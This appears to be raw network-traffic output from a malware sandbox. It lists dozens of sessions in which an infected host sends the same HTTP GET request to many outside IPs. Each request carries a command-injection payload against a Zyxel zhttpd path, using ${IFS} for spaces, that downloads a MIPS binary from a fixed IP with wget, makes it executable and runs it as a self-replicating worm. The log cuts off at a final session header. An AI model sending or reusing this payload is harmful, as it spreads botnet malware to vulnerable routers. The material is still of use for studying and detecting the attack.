                                                Jan 29, 2024 07:07:49.365926027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4614192.168.2.2340142188.69.71.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365964890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4615192.168.2.2342136120.77.144.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365984917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4616192.168.2.234174297.149.59.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366045952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4617192.168.2.2359500163.99.4.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366079092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4618192.168.2.236063273.23.223.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366122007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4619192.168.2.23586842.186.226.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366159916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4620192.168.2.2334526105.249.140.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366187096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4621192.168.2.2355370140.104.87.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366228104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4622192.168.2.235423099.36.52.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366266012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4623192.168.2.23423882.145.61.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366297007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4624192.168.2.235620631.110.190.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366329908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4625192.168.2.2333322113.177.238.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366370916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4626192.168.2.2341356146.225.254.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366415024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4627192.168.2.2360486158.110.229.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366451025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4628192.168.2.2335324179.85.195.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366493940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4629192.168.2.2334096156.37.226.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366528988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4630192.168.2.23561842.1.136.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366554976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4631192.168.2.2356652134.82.103.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366594076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4632192.168.2.2352682212.104.94.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366619110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4633192.168.2.2345998216.96.135.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366658926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4634192.168.2.233383213.91.66.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366692066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4635192.168.2.2341438130.37.67.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366745949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4636192.168.2.235549662.210.32.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366772890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4637192.168.2.2360328153.29.159.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366805077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4638192.168.2.2337122203.91.125.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366852999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4639192.168.2.2357456172.120.249.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366880894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4640192.168.2.2352080103.61.150.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366925001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4641192.168.2.2335192194.152.166.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.366962910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4642192.168.2.2354584196.9.50.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367005110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4643192.168.2.236017614.85.24.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367022038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4644192.168.2.2354242181.175.195.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367042065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4645192.168.2.2355436117.222.52.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367105007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4646192.168.2.2337026154.94.12.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367146969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4647192.168.2.2336834129.99.211.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367177963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4648192.168.2.2335174143.76.126.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367211103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4649192.168.2.233988686.50.163.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367255926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4650192.168.2.2338892101.193.88.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367280006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4651192.168.2.2339592202.84.183.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367316961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4652192.168.2.2351248110.32.150.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367347956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4653192.168.2.234248832.42.20.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367379904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4654192.168.2.234711464.49.29.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367430925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4655192.168.2.233348485.36.225.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367466927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4656192.168.2.2345776219.28.159.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367511988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4657192.168.2.235769657.151.186.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367562056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4658192.168.2.2335488198.154.17.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367599964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4659192.168.2.2349932121.14.183.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367649078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4660192.168.2.2360926107.131.129.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367693901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4661192.168.2.234904674.115.27.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367729902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4662192.168.2.235267643.232.125.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367758036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4663192.168.2.2348812223.212.215.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367805004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4664192.168.2.23483761.227.253.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367861032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4665192.168.2.2332842198.233.228.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367891073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4666192.168.2.2348406115.72.202.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367919922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4667192.168.2.2356952125.24.248.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.367965937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4668192.168.2.2333714110.252.217.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368010998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4669192.168.2.235338248.141.161.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368031979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4670192.168.2.2346116133.121.209.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368077993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4671192.168.2.2358754176.210.101.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368114948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4672192.168.2.2335870100.130.27.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368143082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4673192.168.2.2344938180.172.227.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368176937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4674192.168.2.235590074.237.69.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368213892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4675192.168.2.234043091.123.215.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368242025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4676192.168.2.234362688.253.65.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368292093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4677192.168.2.2333900161.135.248.119443
                                                TimestampBytes transferredDirectionData
